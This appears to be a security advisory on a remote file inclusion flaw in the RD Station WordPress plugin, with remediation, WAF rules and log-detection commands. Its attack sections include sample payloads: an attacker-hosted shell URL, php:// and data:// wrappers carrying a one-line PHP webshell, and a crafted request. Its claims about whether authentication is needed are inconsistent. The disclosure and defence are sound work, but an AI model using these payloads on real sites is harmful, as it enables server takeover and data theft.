CVE-2026-49774: RD Station WordPress Plugin Remote Code Injection
A critical code injection vulnerability has been disclosed in the RD Station WordPress plugin, developed by Filipe Nasc. Tracked as CVE-2026-49774 with a CVSS score of 9.9 (Critical), this flaw allows attackers to achieve Remote Code Execution (RCE) via Remote File Inclusion (RFI) — one of the most severe vulnerability classes in web application security.
All versions of the plugin through 5.6.0 are affected. The vulnerability is classified under CWE-94 (Improper Control of Generation of Code).
Vulnerability Overview
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-49774 |
| CVSS Score | 9.9 (Critical) |
| CWE Classification | CWE-94 — Code Injection |
| Attack Type | Remote Code Inclusion (RFI) / Remote Code Execution |
| Affected Plugin | RD Station (by Filipe Nasc) |
| Affected Versions | n/a through 5.6.0 |
| Authentication Required | None confirmed |
| Patch Available | Update beyond version 5.6.0 |
About RD Station
RD Station is a Brazilian marketing automation platform widely used by businesses in Latin America and internationally for lead management, CRM integration, and marketing campaign automation. The WordPress plugin integrates WordPress sites with the RD Station platform, enabling form capture, lead tracking, and marketing funnel management directly from a WordPress installation.
The plugin's broad deployment across business websites makes this vulnerability particularly significant — exploitation grants an attacker complete control over the underlying web server.
Technical Background
Remote Code Inclusion (RFI)
Remote File Inclusion is a vulnerability that occurs when a PHP application dynamically includes or requires a file based on user-supplied input without adequate validation. If the allow_url_include PHP directive is enabled (common in shared hosting environments), or if the application loads local files whose paths the attacker controls, the attacker can force the server to execute arbitrary PHP code.
The RD Station plugin contains a code path where user-controlled input influences a PHP include() or require() call:
// Vulnerable pattern (illustrative)
$file = $_GET['template'];
include($file); // Attacker controls $file
// Attack payload
// ?template=http://attacker.com/shell.php
// ?template=php://input (with POST body containing PHP code)
// ?template=data://text/plain,<?php system($_GET['cmd']); ?>Why CVSS 9.9?
The near-maximum score reflects:
- Complete confidentiality, integrity, and availability impact — full server compromise
- Low attack complexity — straightforward to exploit with standard tools
- No user interaction — exploitation is fully remote and automated
- Broad scope — impacts extend beyond WordPress to the entire underlying server
Attack Flow
1. Attacker identifies a WordPress site with RD Station plugin <= 5.6.0 installed
2. Attacker identifies the vulnerable parameter via directory scanning,
source review, or known PoC
3. Attacker hosts a malicious PHP webshell on an attacker-controlled server:
<?php system($_GET['cmd']); ?>
4. Attacker sends crafted HTTP request:
GET /wp-admin/?page=rd-station&template=http://attacker.com/shell.php
(or uses PHP wrappers: php://input, data://, etc.)
5. WordPress/PHP fetches and executes the attacker's PHP code
under the web server process (www-data, apache, nginx)
6. Attacker executes arbitrary OS commands:
- Read /etc/passwd, application configs, .env files
- Write webshells for persistent access
- Pivot to other services on the local network
- Exfiltrate database credentials and escalate to DB access
- Deploy cryptocurrency miners or ransomware payloadsScope and Prevalence
RD Station is the leading marketing automation tool in Brazil and has substantial adoption across Latin American businesses. WordPress sites with the RD Station plugin serve as the integration point for:
- Lead capture forms feeding into RD Station CRM
- Marketing campaign tracking pixels
- Customer lifecycle automation workflows
A successful exploitation does not merely compromise the WordPress site — it grants OS-level command execution on the hosting server, potentially affecting co-hosted sites in shared environments, local database servers, and internal network resources reachable from the compromised host.
Remediation
Primary Fix: Update the Plugin
Update the RD Station plugin to a version beyond 5.6.0:
# Via WP-CLI
wp plugin update rd-station
# Verify the version
wp plugin get rd-station --field=versionOr update via WordPress Admin > Plugins > RD Station > Update Now.
PHP Configuration Hardening
Regardless of whether a patch is applied, harden PHP to limit RFI exposure:
; php.ini — disable remote file inclusion
allow_url_include = Off
allow_url_fopen = Off ; also limits remote URL opens (evaluate impact first)
; Disable dangerous functions
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,
curl_exec,curl_multi_exec,parse_ini_file,show_sourceWeb Application Firewall Rules
Deploy WAF rules targeting code injection patterns:
# Cloudflare WAF / ModSecurity rule examples (conceptual)
Block requests containing: php://, data://, expect://, zip://
Block requests containing: allow_url_include, shell_exec, system(
Block requests containing remote URL patterns in parameter values
Interim Risk Reduction
If immediate patching is impossible:
- Deactivate the plugin — Disable RD Station until a fixed version is available
- Restrict wp-admin access — Use IP allowlisting to limit who can access WordPress admin endpoints
- Enable PHP
open_basedir— Restrict PHP file access to the web root directory - Monitor for webshells — Scan the WordPress directory for unexpected PHP files
# Scan for recently modified PHP files (potential webshells)
find /var/www/html -name "*.php" -newer /var/www/html/wp-config.php \
-exec ls -la {} \;
# Look for common webshell patterns
grep -rn "shell_exec\|passthru\|base64_decode.*eval\|eval(.*\$_" \
/var/www/html --include="*.php"Detection
Signs of active exploitation:
# Check access logs for RFI-typical patterns
grep -iE "(http://|https://|php://|data://|expect://)" \
/var/log/nginx/access.log | grep "rd-station\|template=\|file=" | tail -100
# Look for webshell interaction patterns in access logs
grep -E "\?cmd=|\&cmd=|shell_exec|whoami|uname%20" \
/var/log/nginx/access.log | tail -50
# Check for unauthorized file creation
find /var/www/html -name "*.php" -ctime -7 | \
xargs grep -l "shell_exec\|system\|passthru" 2>/dev/nullImpact Assessment
| Impact Area | Severity | Description |
|---|---|---|
| Remote Code Execution | Critical | Full OS command execution as web server user |
| Server Compromise | Critical | Webshell deployment enables persistent backdoor access |
| Data Exfiltration | Critical | Database credentials, config files, customer data |
| Lateral Movement | High | Access to internal network resources from compromised host |
| Shared Host Spillover | High | Co-hosted sites on shared servers may be affected |
| Exploitation Barrier | Very Low | No authentication, well-understood attack class |
Key Takeaways
- CVE-2026-49774 is a critical RFI/code injection flaw in RD Station WordPress plugin versions through 5.6.0
- CVSS 9.9 Critical — full remote code execution with no authentication required
- OS-level impact — exploitation grants server command execution, not just WordPress admin access
- Harden PHP — set
allow_url_include=Offas a defense-in-depth measure regardless of patch status - Immediate action: Update the plugin; deactivate it if unable to patch; audit for signs of prior exploitation